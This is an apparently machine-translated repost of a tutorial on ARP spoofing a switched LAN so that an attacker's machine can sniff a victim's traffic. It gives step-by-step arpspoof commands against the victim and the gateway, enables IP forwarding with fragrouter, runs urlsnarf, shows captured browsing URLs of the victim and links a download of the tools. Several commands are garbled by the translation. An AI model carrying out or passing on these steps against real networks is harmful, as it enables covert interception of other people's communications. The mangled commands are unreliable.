Implement sniffer with ARP Spoofing
Transferred from: Alibaba Cloud security online
Generally, in the LAN environment, we access the Internet through the gateway in the exchange environment. In the exchange environment, we use netxray or Nai sniffer sniffing tools, except for capturing our own packets, you cannot see the network communication of other hosts.
However, we can use ARP spoofing to implement sniffer.
ARP is a protocol used to resolve an IP address to a MAC address. Communication in a LAN is based on Mac.
For example:
In the LAN, 192.168.0.24 and 192.168.0.29 both access the Internet through the gateway 192.168.0.1. If the attacker's system is 192.168.0.24 and he wants to hear the communication between 192.168.0.29, then we can use ARP spoofing.
1. First, tell 192.168.0.29 that the MAC address of the gateway 192.168.0.1 is 192.168.0.24.
2. Tell 192.168.0.1 that the MAC address of 192.168.0.29 is 192.168.0.24.
In this way, packets between 192.168.0.29 and 192.168.0.1 will be sent to 192.168.0.24, that is, the attacker's machine, so that you can hear the session. However, there was a problem in doing so. 192.168.0.29 found that he could not access the Internet, because all the packets sent to 192.168.0.1 were received by 192.168.0.24, but not sent to the gateway 192.168.0.1.
At this time, we can solve this problem by setting a packet forwarding feature for 192.168.0.24, that is, forwarding the packet received from 192.168.0.29 to 192.168.0.1 and sending the packet received from 192.168.0.1 to 192.168.0.29. In this way, 192.168.0.29 won't even realize that it is being monitored.
Specific implementation:
1. Cheat 192.168.0.29 and tell the machine gateway that the MAC address of 192.168.0.1 is itself (192.168.0.24 ).
[Root @ Linux dsniff-2.3] #./arpspoof-I eth0-T 192.168.0.29 192.168.0.1
0: 50: 56: 40: 7: 71 0: 0: 86: 61: 6B: 4E 0806 42: ARP reply 192.168.0.1 is-at 0: 50: 56: 40: 7: 71
0: 50: 56: 40: 7: 71 0: 0: 86: 61: 6B: 4E 0806 42: ARP reply 192.168.0.1 is-at 0: 50: 56: 40: 7: 71
0: 50: 56: 40: 7: 71 0: 0: 86: 61: 6B: 4E 0806 42: ARP reply 192.168.0.1 is-at 0: 50: 56: 40: 7: 71
0: 50: 56: 40: 7: 71 0: 0: 86: 61: 6B: 4E 0806 42: ARP reply 192.168.0.1 is-at 0: 50: 56: 40: 7: 71
0: 0: 21: 0: 0: 18 0: 0: 86: 61: 6B: 4E 0806 42: ARP reply 192.168.0.1 is-at 0: 0: 21: 0: 0: 18
......................................
At this time, ARP spoofing on 192.168.0.29 began.
2. Cheat 192.168.0.1 and tell the gateway that the MAC address of 192.168.0.29 is itself (192.168.0.24 ).
[Root @ Linux dsniff-2.3] #./arpspoof-I eth0-T 192.168.0.1 192.168.0.29
0: 50: 56: 40: 7: 71 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 50: 56: 40: 7: 71
0: 50: 56: 40: 7: 71 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 50: 56: 40: 7: 71
0: 50: 56: 40: 7: 71 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 50: 56: 40: 7: 71
0: 0: 86: 61: 6B: 4E 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 0: 86: 61: 6b: 4E
0: 0: 86: 61: 6B: 4E 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 0: 86: 61: 6b: 4E
0: 0: 86: 61: 6B: 4E 0: 0: 21: 0: 0: 18 0806 42: ARP reply 192.168.0.29 is-at 0: 0: 86: 61: 6b: 4E
In fact, 192.168.0.29 can be found to be cheated at this time. Run the ARP-a command in cmd:
C:/winnt> ARP-
Interface: 192.168.0.29 on interface 0x1000003
Internet address physical address type
192.168.0.1 00-50-56-40-07-71 dynamic
192.168.0.24 00-50-56-40-07-71 dynamic
The MAC addresses of the two IP addresses are exactly the same! But few will do this :-).
3. Set a packet forwarding rule
[Root @ Linux fragrouter-1.6] #./fragrouter-B1
Fragrouter: Base-1: normal IP Forwarding
Before that, do not forget to enable the packet forwarding function.
[Root @ Linux/proc] # Echo 1>/proc/sys/NET/IPv4/ip_forward
Everything is ready. You can start sniffer.
For example, to see where 192.168.0.29 is viewed:
[Root @ Linux dsniff-2.3] #./urlsnscarf
Urlsnali: listening on eth0 [TCP port 80 or port 8080 or port 3128]
Kitty [18/May/2002: 20: 02: 25 + 1100] "Get http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb? Topicid = 29. Topic & Index = 7 HTTP/1.1 "--" http://www.google.com/search? Hl = ZH-CN & Ie = utf8 & OE = utf8 & Q = fdfds & btng = Google % E6 % 90% 9C % E7 % B4 % A2 & LR = "" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 )"
Kitty--[18/May/2002: 20: 02: 28 + 1100] "Get http://www.ezboard.com/ztyles/default.css HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb? Topicid = 29. Topic & Index = 7 "" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 )"
Kitty--[18/May/2002: 20: 02: 29 + 1100] "Get http://www1.ezboard.com/spch.js? Customerid = 1147458082 HTTP/1.1 "--" http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb? Topicid = 29. Topic & Index = 7 "" Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0 )"
You can also know other things ......... :-)
The entire process needs to be implemented in Linux. All the tools used can be downloaded at http://www.piaoye.net/downsniffer/arpsniffer.zip( 2.98 MB ).